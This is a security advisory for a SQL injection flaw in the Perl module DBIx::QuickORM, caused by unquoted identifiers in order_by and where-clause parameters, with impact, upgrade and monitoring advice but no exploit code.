CVE-2026-13766
EXODIST · DBIx::QuickORM
DBIx::QuickORM for Perl is vulnerable to SQL injection via unquoted SQL identifiers when untrusted input is passed to identifier-related parameters.
Executive summary
A critical SQL injection vulnerability in EXODIST DBIx::QuickORM allows unauthenticated attackers to manipulate database queries, potentially leading to unauthorized data disclosure or tampering.
Vulnerability
The vulnerability exists because the SQL builder fails to quote identifiers, causing user-supplied input in order_by or where-clause parameters to be processed as raw SQL. This flaw allows an unauthenticated attacker to inject malicious SQL commands into the database backend.
Business impact
Successful exploitation poses a severe risk to data integrity and confidentiality. With a CVSS score of 9.8, this flaw could allow attackers to bypass standard query logic to extract sensitive information or modify records, potentially leading to total database compromise and significant reputational damage.
Remediation
Immediate Action: Upgrade DBIx::QuickORM to version 0.000026 or later immediately to resolve the identifier quoting issue.
Proactive Monitoring: Review database access logs for anomalous query patterns, particularly those involving unusual sub-selects or unexpected column references.
Compensating Controls: Implement strict input validation and sanitization for any application parameters that influence SQL identifiers or ordering logic to block malicious payloads.
Exploitation status
Public Exploit Available: No
Analyst recommendation
This vulnerability represents a significant security risk for applications relying on DBIx::QuickORM. Organizations must prioritize updating their dependencies to the patched version, as SQL injection remains a primary vector for data breaches. Immediate patching is required to neutralize the threat.